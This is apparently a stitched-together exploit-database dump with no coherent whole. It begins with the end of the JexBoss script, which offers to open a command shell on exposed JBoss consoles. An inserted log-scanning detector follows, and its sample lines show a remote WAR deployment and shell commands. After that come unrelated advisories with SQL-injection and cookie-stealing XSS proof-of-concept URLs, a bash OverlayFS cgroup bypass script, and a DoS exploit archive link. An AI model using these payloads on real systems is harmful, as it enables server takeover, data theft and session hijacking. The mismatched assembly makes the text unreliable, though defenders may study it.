status, message = checkArgs(sys.argv)
if status == 0:
	url = sys.argv[1]
elif status == 1:
	print RED + "\n * Error: %s" %message
	print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC
	sys.exit(status)
elif status == 2:
	url = ''.join(['http://',sys.argv[1]])

# check vulnerabilities
mapResult = checkVul(url)

# performs exploitation
for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:
	if mapResult[i] == 200 or mapResult[i] == 500:
		print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"
			   	      "   This operation will provide a simple command shell to execute commands on the server..\n"
			   	 +RED+"   Continue only if you have permission!" +ENDC)
		if raw_input("   yes/NO ? ").lower() == "yes":
			autoExploit(url, i)

# resume results
if mapResult.values().count(200) > 0:
	banner()
	print RED+ " Results: potentially compromised server!" +ENDC
	print (GREEN+" * - - - - - - -  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"
			  " Recommendations: \n"
			  " - Remove web consoles and services that are not used, eg:\n"
			  "    $ rm web-console.war\n"
			  "    $ rm http-invoker.sar\n"
			  "    $ rm jmx-console.war\n"
			  "    $ rm jmx-invoker-adaptor-server.sar\n"
			  "    $ rm admin-console.war\n"
			  " - Use a reverse proxy (eg. nginx, apache, f5)\n"
			  " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
			  " - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"
			  " References:\n"
			  "   [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
			  "   [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
			  "\n"
			  " - If possible, discard this server!\n\n"
			  " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )
elif mapResult.values().count(505) == 0:
	print ( GREEN+ "\n\n * Results: \n"
			"   The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)

# infos	
print (ENDC+" * Info: review, suggestions, updates, etc: \n"
			 "   https://github.com/joaomatosf/jexboss\n"
			 "   joaomatosf@gmail.com\n")

print ENDC
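The JexBoss script above leaves a recognisable trail in the target's web server access log: the `jexboss` User-Agent it sends to its JSP shells, the two shell paths it deploys, the management endpoints it calls and the deployer MBeans it names in the query string. The detector below is an added example for defenders, not part of JexBoss; it assumes Apache/nginx "combined" log format and scans constructed sample lines.

```python
import re
from urllib.parse import unquote

# Indicators taken from the JexBoss script: User-Agent sent to its JSP shells,
# the shell paths it deploys, the endpoints it calls and the MBeans it invokes.
SHELL_USER_AGENT = "jexboss"
SHELL_PATHS = ("/jbossass/jbossass.jsp", "/shellinvoker/shellinvoker.jsp")
MANAGEMENT_ENDPOINTS = ("/jmx-console/HtmlAdaptor",
                        "/invoker/JMXInvokerServlet",
                        "/web-console/Invoker")
DEPLOYER_MBEANS = ("jboss.system:service=MainDeployer",
                   "jboss.admin:service=DeploymentFileRepository")

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample lines (not real traffic): one host deploys a WAR via the
# HtmlAdaptor and then talks to the shell; another only POSTs a serialized
# object to JMXInvokerServlet (the MBean name is in the body, so only the
# endpoint is visible in the access log).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2015:12:00:01 +0000] "HEAD /jmx-console/HtmlAdaptor'
    '?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=19'
    '&arg0=http://198.51.100.7/jbossass.war HTTP/1.1" 200 - "-" "-"',
    '198.51.100.7 - - [10/Jan/2015:12:00:09 +0000] "GET /jbossass/jbossass.jsp'
    '?ppp=uname+-a HTTP/1.1" 200 211 "-" "jexboss"',
    '203.0.113.5 - - [10/Jan/2015:12:01:00 +0000] "GET /index.html HTTP/1.1"'
    ' 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2015:12:01:02 +0000] "POST /invoker/JMXInvokerServlet'
    ' HTTP/1.1" 500 - "-" "Java/1.7.0_45"',
]

def indicators(line):
    """Return the indicator names matched by one access log line ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []                      # unparseable line: report nothing
    path = unquote(m.group("path"))    # decode %xx so encoded MBean names still match
    hits = []
    if m.group("ua").lower() == SHELL_USER_AGENT:
        hits.append("jexboss-user-agent")
    if any(path.startswith(p) for p in SHELL_PATHS):
        hits.append("jexboss-webshell-path")
    if any(path.startswith(e) for e in MANAGEMENT_ENDPOINTS):
        hits.append("jboss-management-endpoint")
        if any(b in path for b in DEPLOYER_MBEANS):
            hits.append("jboss-deployer-invocation")
    return hits

def scan(lines):
    """Aggregate indicators per source IP: {ip: sorted list of indicator names}."""
    report = {}
    for line in lines:
        hits = indicators(line)
        if hits:
            ip = LOG_RE.match(line).group("ip")
            report.setdefault(ip, set()).update(hits)
    return {ip: sorted(names) for ip, names in report.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

A shell path or `jexboss` User-Agent hit is a post-compromise signal; a deployer invocation alone means the management interface is reachable and should be removed or put behind the reverse proxy, as the tool's own recommendations state.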
            
source: https://www.securityfocus.com/bid/51533/info

Freelance Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/freelance/show_code.php?code_id=8'a 
            
source: https://www.securityfocus.com/bid/51532/info

MMORPG Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/games/view_news.php?news_id=7'a 
            
source: https://www.securityfocus.com/bid/51530/info

Toner Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/united/show_series_ink.php?id=1'a 
            
#source: https://www.securityfocus.com/bid/51529/info

#OverlayFS is prone to a local security-bypass vulnerability.

#Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions. 



#!/bin/bash

ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5 }'`
if [ "x$ddir" = "x" ]; then
 echo "couldn't find devices cgroup mountpoint"
 exit 1
fi

# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`

# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`

# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`

mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"

# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"

# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"

umount $odir
rmdir $odir
rm -rf $udir

# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
            
source: https://www.securityfocus.com/bid/51431/info

Giveaway Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Giveaway Manager 3 is vulnerable; other versions may also be affected.

http://www.example.com/members.php?id=[XSS] 
            
source: https://www.securityfocus.com/bid/51444/info

Rockwell Automation FactoryTalk Activation Server is prone to multiple remote denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the affected application, denying service to legitimate users. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36570.zip
            
source: https://www.securityfocus.com/bid/51428/info

phpVideoPro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

phpVideoPro 0.9.7 is vulnerable; prior versions may also be affected. 

http://www.example.com/phpvideopro-0.9.7/help/index.php?topic='"</script><script>alert(document.cookie)</script>
http://www.example.com/phpvideopro-0.9.7/login/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/configure.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/medialist.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/setfilter.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/search.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/listgen.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/label.php/"><script>alert(document.cookie)</script><"
            
source: https://www.securityfocus.com/bid/51434/info

Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]